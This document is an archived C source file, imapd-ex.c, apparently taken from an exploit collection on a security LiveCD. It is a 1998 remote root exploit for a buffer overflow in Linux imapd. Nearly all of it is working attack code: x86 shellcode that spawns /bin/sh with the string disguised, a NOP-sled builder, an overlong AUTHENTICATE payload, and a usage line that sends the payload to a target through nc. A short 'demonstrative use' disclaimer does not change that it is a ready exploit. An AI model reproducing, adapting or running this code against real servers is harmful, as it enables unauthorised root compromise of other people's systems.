home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / imapd / imapd-ex.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  93 lines

---

1. /*
2.  
3.     Imapd exploit code for x86 linux
4.  
5.     Remote user can gain root access.
6.     Tested redhat linux : 4.1 , 4.2 and 5.0
7.     Tested imapd version : 9.0 , 10.166 , 10.190 , 10.205 and 10.223
8.  
9.     Usage
10.     $ ( imapd-ex 0 ; cat ) | nc target.com 143
11.                  |
12.                  +------ try from -3000 to 3000 ( try in steps of 500 )
13.  
14.     How to patch imapd buffer overflow bug
15.     See http://www.cert.org/advisories/CA-98.09.imapd.html
16.  
17.     This program is only for demonstrative use only.
18.     USE IT AT YOUR OWN RISK!
19.  
20.     Programmed by Taeho Oh 1998/09/23
21.  
22. Taeho Oh ( ohhara@postech.ac.kr )                http://ohhara.postech.ac.kr
23.  
24. */
25.  
26. #include<stdio.h>
27. #include<stdlib.h>
28.  
29. #define OFFSET                            0
30. #define RET_POSITION                   1032
31. #define RANGE                            20
32. #define NOP                            0x90
33.  
34. char shellcode[1024]=
35.     "\xeb\x38"                      /* jmp 0x38             */
36.     "\x5e"                          /* popl %esi            */
37.     "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi) */
38.     "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi) */
39.     "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi) */
40.     "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi) */
41.     "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi) */
42.     "\x89\xf0"                      /* movl %esi,%eax       */
43.     "\x83\xc0\x08"                  /* addl $0x8,%eax       */
44.     "\x89\x46\x08"                  /* movl %eax,0x8(%esi)  */
45.     "\x31\xc0"                      /* xorl %eax,%eax       */
46.     "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
47.     "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
48.     "\xb0\x0b"                      /* movb $0xb,%al        */
49.     "\x89\xf3"                      /* movl %esi,%ebx       */
50.     "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
51.     "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
52.     "\xcd\x80"                      /* int $0x80            */
53.     "\x31\xdb"                      /* xorl %ebx,%ebx       */
54.     "\x89\xd8"                      /* movl %ebx,%eax       */
55.     "\x40"                          /* inc %eax             */
56.     "\xcd\x80"                      /* int $0x80            */
57.     "\xe8\xc3\xff\xff\xff"          /* call -0x3d           */
58.     "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"    */ /* /bin/sh is disguised */
59.  
60. void main(int argc,char **argv)
61. {
62.     char buff[RET_POSITION+RANGE+1],*ptr;
63.     long *addr_ptr,addr;
64.     unsigned long sp;
65.     int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
66.     int i;
67.  
68.     if(argc>1)
69.         offset=atoi(argv[1]);
70.  
71.     sp=0xbffff29f;
72.     addr=sp-offset;
73.  
74.     ptr=buff;
75.     addr_ptr=(long*)ptr;
76.     for(i=0;i<bsize;i+=4)
77.         *(addr_ptr++)=addr;
78.  
79.     for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
80.         buff[i]=NOP;
81.  
82.     ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
83.     for(i=0;i<strlen(shellcode);i++)
84.         *(ptr++)=shellcode[i];
85.  
86.     buff[bsize-1]='\0';
87.  
88.     printf("* AUTHENTICATE {%d}\r\n",bsize);
89.     for(i=0;i<bsize;i++)
90.         putchar(buff[i]);
91.     printf("\r\n");
92. }
93.